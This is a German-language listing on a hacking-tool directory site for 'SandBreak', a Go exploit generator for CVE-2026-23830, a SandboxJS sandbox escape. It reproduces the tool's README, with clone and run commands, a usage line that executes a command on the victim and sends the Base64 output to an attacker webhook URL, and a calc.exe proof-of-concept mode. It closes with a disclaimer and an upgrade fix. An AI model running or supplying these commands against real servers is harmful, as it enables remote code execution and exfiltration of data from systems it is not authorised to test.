Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/galaxy-sc/cve-2026-23830-sandbreak
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed Teaming
GitHubgalaxy-sc/cve-2026-23830-sandbreak

CVE-2026-23830-SandBreak

# Generiert und liefert Exploit-Payloads für CVE-2026-23830, einen SandboxJS-Escape, mit Modi für blinde OOB-Exfiltration und lokalen Calc-PoC. Unterstützt HTTP/HTTPS-Listener und erzeugt minifizierte JavaScript-Payloads.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Repository anzeigen
16vor 7 MonatenNoch nicht geprüft
Teilen

SandBreak

CVE-2026-23830 Exploit-Generator & Auto-Pwn-Tool

Go Version License Type

SandBreak ist ein robuster, in Go geschriebener Exploit-Generator, der entwickelt wurde, um die SandboxJS-Escape-Schwachstelle (CVE-2026-23830) auszunutzen.

Dieses Tool nutzt den ungeschützten AsyncFunction-Konstruktor in älteren Versionen von sandboxjs aus, wodurch Angreifer die V8-Sandbox-Umgebung verlassen und beliebigen Code auf dem Host-System ausführen können. Es unterstützt mehrere Payload-Modi, darunter Blind OOB Exfiltration, Defacement und Error-Based RCE.


Funktionen

  • 2 Angriffsmodi:
    • oob: Out-of-Band-Datenexfiltration (HTTP/HTTPS) für Blind-Szenarien.
  • calc: Öffnet calc.exe (klassischer PoC).
  • Smart OOB: Erkennt automatisch HTTP vs. HTTPS, um Serverabstürze zu verhindern.
  • Go-basiert: Einzelne Binärdatei, keine Abhängigkeiten auf dem Angreifer-Rechner erforderlich.
  • Leichtgewichtig: Generiert reine, minifizierte JavaScript-Payloads.

  • Installation

    Repository klonen und ausführen:

    root@kitploit:~
    git clone https://github.com/Galaxy-sc/CVE-2026-23830-SandBreak.git
    cd CVE-2026-23830-SandBreak
    go run CVE-2026-23830.go
    

    Verwendung

    root@kitploit:~
    go run CVE-2026-23830.go -mode [MODUS] -cmd [BEFEHL] [OPTIONEN]
    

    1. OOB-Modus (Blind RCE - Professionell)

    Verwenden Sie diesen Modus, wenn Sie kein Ausgabe-Feedback haben. Er führt den Befehl aus und sendet das Base64-kodierte Ergebnis an Ihren Listener (z. B. webhook.site).

    root@kitploit:~
    go run CVE-2026-23830.go -mode oob -cmd "whoami" -url "https://webhook.site/YOUR-UUID"
    

    Umgeht erfolgreich grundlegende Egress-Filtering-Abstürze durch Behandlung von Netzwerkfehlern.

    2. Calc-Modus (Lokaler Test)

    Öffnet einen Taschenrechner auf dem Windows-Server.

    root@kitploit:~
    go run CVE-2026-23830.go -mode calc
    

    Proof of Concept (PoC)

    Szenario: OOB-Exfiltration

    Angreifer empfängt die Benutzerdaten des Servers über Webhook, obwohl keine visuelle Ausgabe auf der Website sichtbar ist.


    Haftungsausschluss

    Dieses Tool wurde ausschließlich für Bildungszwecke und autorisierte Penetrationstests erstellt.

    • Verwenden Sie dieses Tool nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.
    • Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

    Gegenmaßnahmen

    Aktualisieren Sie sandboxjs auf die neueste Version, in der der AsyncFunction-Konstruktor ordnungsgemäß in der Sandbox isoliert ist.

    root@kitploit:~
    npm update sandboxjs
    

    Autor: Meysam Bal-afkan

    Lizenz: MIT

    Tool herunterladen